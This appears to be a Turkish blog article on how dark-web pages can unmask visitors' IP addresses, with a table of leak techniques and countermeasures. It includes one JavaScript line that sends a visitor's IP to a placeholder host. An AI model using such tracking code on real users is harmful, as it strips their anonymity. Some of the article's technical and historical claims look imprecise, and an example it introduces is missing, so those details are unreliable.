Dark Web’in en temel güvenlik vaadi anonimliktir. Tor tarayıcısına girdin mi, kimliğin maskelenir, IP adresin gizlenir, hareketlerin görünmez olur, öyle değil mi? Değil. Çünkü karanlıkta bile seni görebilen gözler var. Bazen bir sayfayı açmak bile yeterli oluyor. Evet, sadece bir .onion bağlantısına tıklamak… ve IP adresin artık görünür halde.
Bu, kötü niyetli bir hikaye değil; yaşanmış onlarca olayın sessiz çığlığı. Deep Web’e adım atan birçok kullanıcı, VPN açmadan, güvenlik katmanlarını düşünmeden sadece bir bağlantıya tıklayarak kendini açık etti. Üstelik haberleri bile olmadı. Çünkü bazen seni hackleyen şey, bir dosya değil, bir sayfanın içine gömülmüş görünmez kod parçacığıdır.
Tor Tarayıcısı Yeterli mi? Aslında Hayır
Tor Browser teoride seni anonimleştirir. Ama eğer sistemin açıksa, tarayıcın güncel değilse, veya Tor’un içinden çıkmaya çalışan bir siteye bağlantı kuruluyorsa... zincir kırılır. En zayıf halka, sistem güvenliğidir, yazılım değildir.
Bazı sayfalar, tarayıcı üzerinden seni dışarı yönlendirir. Örneğin:
Bu ne demek? Bir .onion sayfası, sayfanın içine gizlenmiş bir normal IP adresine bağlantı kuruyor. Tor tarayıcısı doğru yapılandırılmadıysa ya da WebRTC açıksa, bu bağlantı dış IP üzerinden gider. Ve senin asıl IP adresin karşı sunucuya ulaşır.
Gerçek Olay: 2017 FBI Operasyonu
2017’de FBI, bir çocuk istismarı sitesini ele geçirdi ve siteyi kendi kontrolü altına aldı. Ancak kullanıcılar sayfanın hala aktif olduğunu sandı. Sayfa açıldığında, tarayıcıya özel bir JavaScript yüklendi ve bu kod, gerçek IP adresini tespit edip gizlice gönderdi. Hedeflere herhangi bir tıklama yaptırılmadı. Sadece sayfayı açmaları yetti.
document.location = "http://198.51.100.42/log?ip=" + myActualIP;
Bu operasyon sonucunda 1000’den fazla kullanıcı yakalandı. Kimi sadece "bakmak için girmiştim" dese de, sistem bunu dinlemiyordu. Çünkü açtığın sayfa, seni zaten ele vermişti.
Tablo: Dark Web’de IP Açığa Çıkartan 5 Teknik
| Teknik Adı | Açıklama | Ne Zaman Aktifleşir? | Korunma Yolu |
|---|---|---|---|
| WebRTC Leak | Tarayıcının yerel IP'yi sızdırması | Sayfa açıldığında otomatik | Tarayıcı ayarlarından WebRTC devre dışı bırakılmalı |
| Hidden iFrame | Sayfaya görünmez şekilde yerleştirilmiş dış bağlantı | HTML sayfa yüklendiği anda | NoScript ve sandbox yapılandırması kullan |
| External JavaScript | Dış bir kaynaktan gelen aktif kod | Sayfa içerik yüklemesinde | Script çalışmasını engelleyen eklentiler |
| Exit Node Sniffing | Tor çıkış noktasının aktif IP kayıtları tutması | Bağlantı kurulduğunda | VPN + Tor kombinasyonu kullan |
| Auto Download Trap | Sayfa yüklenince tetiklenen zararlı dosya inmesi | İzin vermesen bile arka planda tetiklenebilir | İndirme izinlerini kapalı tut, sanal makine kullan |
Açtığın Sayfa Sandığın Gibi Bir Sayfa Değil
Bazı siteler sadece içerik göstermiyor. Giriş yapan herkesi bir veri noktasına dönüştürüyor. Loglar, IP analizleri, kullanıcı davranışları saniyelik olarak kaydediliyor. Çünkü sayfa, senin geldiğini bilmek istiyor. Kimliğini değil, varlığını. O sayfaya ulaştığında sistem kendi kendine şunu söylüyor: "Artık buradasın."
Hatta bazı .onion adresleri, ilk açıldığında kendini kapatıyor. Sadece senin geldiğini görmek için yaşıyor. Sayfa yükleniyor, senin IP’n veya sistem detayların alınıyor ve site kendini otomatik olarak silip yok ediyor. Bu tür geçici sistemler, saldırganlar veya istihbarat yapıları tarafından “aktif tuzak” olarak kullanılıyor.
Gizlenmek İçin Girmeyip, Açığa Çıktığın Yer
İnternette karanlık dolaşmak; sadece maske takmakla olmuyor. Maske takarken gözünden düşen ter bile seni ele verir. Aynı şekilde, doğru yapılandırılmamış bir sistemde, sadece bir sayfa açmak bile seni savunmasız bırakabilir. Ve seni izleyen sistem, sen daha “ne izlediğini anlamadan” seni kaydeder.
Bazı kapılar, ardına kadar açılmaz. Sadece seni izlemek için aralanır. O adımı atarken, belki de en başından itibaren izleniyordun.